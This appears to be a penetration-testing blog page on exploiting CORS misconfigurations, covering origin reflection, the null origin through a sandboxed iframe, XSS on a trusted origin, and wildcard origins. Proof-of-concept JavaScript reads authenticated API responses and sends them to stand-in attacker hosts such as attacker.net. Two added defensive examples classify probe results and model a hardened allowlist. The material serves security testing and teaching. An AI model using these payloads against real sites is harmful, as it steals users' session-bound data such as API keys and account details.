Ender's Blogs
CORS
A site-wide CORS misconfiguration was in place for an API domain. The application reflected any value of the request's Origin header into Access-Control-Allow-Origin instead of checking it against an allowlist, and it also sent Access-Control-Allow-Credentials: true. A page on an attacker's site could therefore make requests to the API with the victim's cookies attached and read the responses, which is what turns an ordinary cross-origin request into a data-theft primitive.

Summary

  • Prerequisites
  • Exploitation
  • References

Prerequisites

  • BURP HEADER (Request) > Origin: https://evil.com
  • VICTIM HEADER (Response) > Access-Control-Allow-Credentials: true
  • VICTIM HEADER (Response) > Access-Control-Allow-Origin: https://evil.com (the request origin is reflected)
  • BURP HEADER (Request) > Origin: null AND VICTIM HEADER (Response) > Access-Control-Allow-Origin: null
Check this manually: resend the request in Burp with a modified Origin header (your own domain, then null, then a subdomain of the target) and read the response headers each time. Do not rely on a single reflected Origin or on a scanner's finding alone; both Access-Control-Allow-Origin and Access-Control-Allow-Credentials: true must be present for the victim's session data to be readable.
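To make that manual check repeatable, the following added example (mine, not code from the original page) classifies a probe result from the Origin value that was sent and the response headers that came back. Header names are compared case-insensitively and the origin exactly (scheme, host and port), which is how a browser compares them. The sample responses at the bottom are constructed for illustration, not captured from a real target; https://evil.com is the attacker origin assumed throughout this page.

```javascript
// Added example, not part of the original page: classify what an attacker page
// can read, given the Origin sent in a probe and the CORS headers that came back.

// Lower-case header names so the lookup is case-insensitive (HTTP header names are).
function normaliseHeaders(headers) {
  const out = {};
  for (const [name, value] of Object.entries(headers)) {
    out[name.toLowerCase()] = String(value).trim();
  }
  return out;
}

// Verdicts:
//   reflected : ACAO equals the probe origin  -> attacker page can read the response
//   null      : ACAO is the literal "null"    -> exploitable from a sandboxed iframe / data: URI
//   wildcard  : ACAO is "*"                   -> readable, but the browser rejects credentialed reads
//   allowlist : ACAO names a different origin -> only reachable via XSS on that origin
//   none      : no ACAO at all                -> the browser blocks the cross-origin read
function classifyCors(probeOrigin, responseHeaders) {
  const h = normaliseHeaders(responseHeaders);
  const acao = h["access-control-allow-origin"];
  // The browser requires the literal value "true"; anything else counts as absent.
  const acac = h["access-control-allow-credentials"] === "true";

  if (acao === undefined) return { verdict: "none", credentialed: false, impact: "not readable" };
  if (acao === "*") {
    // "*" is never valid together with credentials, so only public data is exposed.
    return { verdict: "wildcard", credentialed: false, impact: "unauthenticated data only" };
  }
  // Browsers compare the serialised origin byte-for-byte: scheme, host and port must all match.
  const verdict = acao === "null" ? "null" : acao === probeOrigin ? "reflected" : "allowlist";
  let impact = "not readable";
  if (verdict === "reflected" || verdict === "null") {
    impact = acac ? "authenticated data readable" : "unauthenticated data only";
  }
  return { verdict, credentialed: acac, impact };
}

// Constructed sample probe results (illustrative, not captured from a real target).
const SAMPLE_PROBES = [
  { name: "origin reflection", origin: "https://evil.com",
    headers: { "Access-Control-Allow-Origin": "https://evil.com", "Access-Control-Allow-Credentials": "true" } },
  { name: "null origin allowed", origin: "null",
    headers: { "access-control-allow-origin": "null", "Access-Control-Allow-Credentials": "true" } },
  { name: "wildcard", origin: "https://evil.com",
    headers: { "Access-Control-Allow-Origin": "*" } },
  { name: "strict allowlist", origin: "https://evil.com",
    headers: { "Access-Control-Allow-Origin": "https://trusted-origin.example.com", "Access-Control-Allow-Credentials": "true" } },
  { name: "reflected but no credentials", origin: "https://evil.com",
    headers: { "Access-Control-Allow-Origin": "https://evil.com" } },
  { name: "no CORS headers", origin: "https://evil.com",
    headers: { "Content-Type": "application/json" } },
];

// Classify every sample; returns one result object per probe, in order.
function runSampleProbes() {
  return SAMPLE_PROBES.map((p) => ({ name: p.name, ...classifyCors(p.origin, p.headers) }));
}

for (const r of runSampleProbes()) {
  console.log(`${r.name}: ${r.verdict} (credentials=${r.credentialed}) -> ${r.impact}`);
}
```

Feed it the headers Burp shows for each resent request; only "authenticated data readable" means the victim's session can be abused from an attacker-controlled page, while "allowlist" is the case that needs the XSS-on-trusted-origin route described further down.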

Exploitation

Usually you want to target an API endpoint that returns sensitive data (API keys, tokens, account details). Use the following payloads to exploit a CORS misconfiguration on the target https://victim.example.com/endpoint.

Vulnerable Example: Origin Reflection

Vulnerable Implementation
GET /endpoint HTTP/1.1
Host: victim.example.com
Origin: https://evil.com
Cookie: sessionid=...

HTTP/1.1 200 OK
Access-Control-Allow-Origin: https://evil.com
Access-Control-Allow-Credentials: true

{"[private API key]"}
Proof of concept
// Host this on the attacker's site: withCredentials makes the browser attach the
// victim's cookies, and the reflected ACAO lets the page read the reply.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://victim.example.com/endpoint', true);
req.withCredentials = true;
req.send();

function reqListener() {
  // Exfiltrate the response body; encode it so it survives as a query parameter.
  location = '//attacker.net/log?key=' + encodeURIComponent(this.responseText);
};
or
<html>
<body>
<h2>CORS PoC</h2>
<div id="demo">
  <button type="button" onclick="cors()">Exploit</button>
</div>
<script>
function cors() {
  var xhr = new XMLHttpRequest();
  xhr.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      // Show the stolen response in the page (alert() returns undefined, so do not assign it)
      document.getElementById("demo").innerText = this.responseText;
      alert(this.responseText);
    }
  };
  xhr.open("GET", "https://victim.example.com/endpoint", true);
  // Send the victim's cookies with the cross-origin request
  xhr.withCredentials = true;
  xhr.send();
}
</script>
</body>
</html>
Cross-origin XMLHttpRequest and fetch() calls do not include cookies by default. To send the victim's session cookie, set the XMLHttpRequest's .withCredentials property to true (or credentials: 'include' for fetch). The browser then only exposes the response if the server answers with Access-Control-Allow-Credentials: true and an Access-Control-Allow-Origin that matches the requesting origin exactly; a wildcard is rejected for credentialed requests.

Vulnerable Example: Null Origin

Vulnerable Implementation
It is possible that the server does not reflect arbitrary Origin values but does allow the null origin. The server's response then looks like this:
GET /endpoint HTTP/1.1
Host: victim.example.com
Origin: null
Cookie: sessionid=...

HTTP/1.1 200 OK
Access-Control-Allow-Origin: null
Access-Control-Allow-Credentials: true

{"[private API key]"}
Proof of concept
This can be exploited by putting the attack code into a sandboxed iframe loaded from a data: URI. Content loaded that way has an opaque origin, so the browser sends Origin: null with the request; allow-top-navigation is needed so the frame can redirect the top-level page to the attacker's log endpoint:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" src="data:text/html, <script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://victim.example.com/endpoint',true);
req.withCredentials = true;
req.send();

function reqListener() {
  location='https://attacker.example.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>

Vulnerable Example: XSS on Trusted Origin

If the application implements a strict whitelist of allowed origins, the exploit code above does not work from an attacker-controlled origin. But if you have an XSS on a trusted (whitelisted) origin, you can inject the same exploit code there, so the request is sent from an origin the server accepts:
https://trusted-origin.example.com/?xss=<script>CORS-ATTACK-PAYLOAD</script>
Sometimes the payload runs but nothing pops up (for example the redirect to the logging server is blocked). You can then read the response directly from the browser console:
https://trusted-origin.example.com/?xss=<script>var req = new XMLHttpRequest(); req.open('get','https://acb01fc81f8f9958806a0dee004900a5.web-security-academy.net/accountDetails',true); req.withCredentials = true; req.send();</script>
Open the browser's Console and evaluate req.response (or req.responseText) once the request has completed.

Vulnerable Example: Wildcard Origin * without Credentials

If the server responds with the wildcard origin *, the browser never exposes a credentialed response: Access-Control-Allow-Origin: * is not accepted together with credentials, and without withCredentials no cookies are sent in the first place, so the victim's session cannot be abused. However, if the endpoint does not require authentication, its data is still readable from any origin. This matters for internal servers that are not reachable from the Internet: a page on the attacker's website, opened in a browser inside the network, can pivot to the internal server and read its data without authentication.
Vulnerable Implementation
GET /endpoint HTTP/1.1
Host: api.internal.example.com
Origin: https://evil.com

HTTP/1.1 200 OK
Access-Control-Allow-Origin: *

{"[private API key]"}
Proof of concept
// No withCredentials here: the wildcard ACAO only permits anonymous reads,
// which is enough when the endpoint needs no authentication.
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get', 'https://api.internal.example.com/endpoint', true);
req.send();

function reqListener() {
  location = '//attacker.net/log?key=' + encodeURIComponent(this.responseText);
};
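The three vulnerable responses on this page (origin reflection, null origin, wildcard) each come from a different server-side decision about the Origin header. The following added example (mine, not the page's or any project's code) writes those decisions out as small policy functions next to a hardened exact-match allowlist, and runs each through the check a browser applies before it lets a page read a cross-origin response. The trusted origins, the attacker origin https://evil.com and the null origin used for the sandboxed-iframe case are assumptions for illustration; the browser check is a simplified model of the Fetch spec's CORS check and ignores preflights.

```javascript
// Added example, not the original page's code: server-side origin handling behind
// each vulnerable response above, a hardened allowlist, and the browser-side check
// that decides whether an attacker page gets to read the response.

// Assumed allowlist for illustration.
const TRUSTED_ORIGINS = new Set([
  "https://trusted-origin.example.com",
  "https://victim.example.com",
]);

// Vulnerable (origin reflection): echoes whatever Origin arrives, with credentials.
function reflectingPolicy(origin) {
  if (origin === undefined) return {};
  return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true" };
}

// Vulnerable (null origin): allowlist plus "null", typically added so local files or
// redirected requests keep working. A sandboxed iframe or data: URI also sends Origin: null.
function nullTolerantPolicy(origin) {
  if (origin === "null" || TRUSTED_ORIGINS.has(origin)) {
    return { "Access-Control-Allow-Origin": origin, "Access-Control-Allow-Credentials": "true" };
  }
  return {};
}

// Wildcard: acceptable for public data only; never combine it with credentials.
function wildcardPolicy() {
  return { "Access-Control-Allow-Origin": "*" };
}

// Hardened: exact-match allowlist, no CORS headers for unknown origins, and Vary: Origin
// so a shared cache cannot serve one origin's ACAO to a different origin.
function allowlistPolicy(origin) {
  const headers = { Vary: "Origin" };
  if (origin !== undefined && TRUSTED_ORIGINS.has(origin)) {
    headers["Access-Control-Allow-Origin"] = origin;
    headers["Access-Control-Allow-Credentials"] = "true";
  }
  return headers;
}

// Simplified Fetch-spec CORS check. requestOrigin is the serialised origin of the page
// making the request ("null" for sandboxed/data: contexts); withCredentials mirrors
// xhr.withCredentials. Returns true when the browser exposes the response body.
function browserAllowsRead(requestOrigin, withCredentials, responseHeaders) {
  const acao = responseHeaders["Access-Control-Allow-Origin"];
  if (acao === undefined) return false;
  if (!withCredentials && acao === "*") return true;
  if (acao !== requestOrigin) return false;          // "*" fails here for credentialed requests
  if (!withCredentials) return true;
  return responseHeaders["Access-Control-Allow-Credentials"] === "true";
}

// Walk each policy through the attacker's origins and one trusted origin.
function evaluatePolicies() {
  const cases = [
    ["reflecting", reflectingPolicy, "https://evil.com", true],
    ["null-tolerant", nullTolerantPolicy, "null", true],
    ["wildcard (no creds)", wildcardPolicy, "https://evil.com", false],
    ["wildcard (with creds)", wildcardPolicy, "https://evil.com", true],
    ["allowlist vs evil.com", allowlistPolicy, "https://evil.com", true],
    ["allowlist vs null", allowlistPolicy, "null", true],
    ["allowlist vs trusted", allowlistPolicy, "https://trusted-origin.example.com", true],
  ];
  const outcome = {};
  for (const [name, policy, origin, creds] of cases) {
    outcome[name] = browserAllowsRead(origin, creds, policy(origin));
  }
  return outcome;
}

for (const [name, readable] of Object.entries(evaluatePolicies())) {
  console.log(`${name}: attacker page can read response = ${readable}`);
}
```

The two "wildcard" rows are the point of the last section above: the same response is readable anonymously and unreadable as soon as credentials are attached, so a wildcard only leaks what the endpoint would hand to anyone anyway. The allowlist rows show why the XSS-on-trusted-origin route is the only one left once the server compares origins exactly.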

References
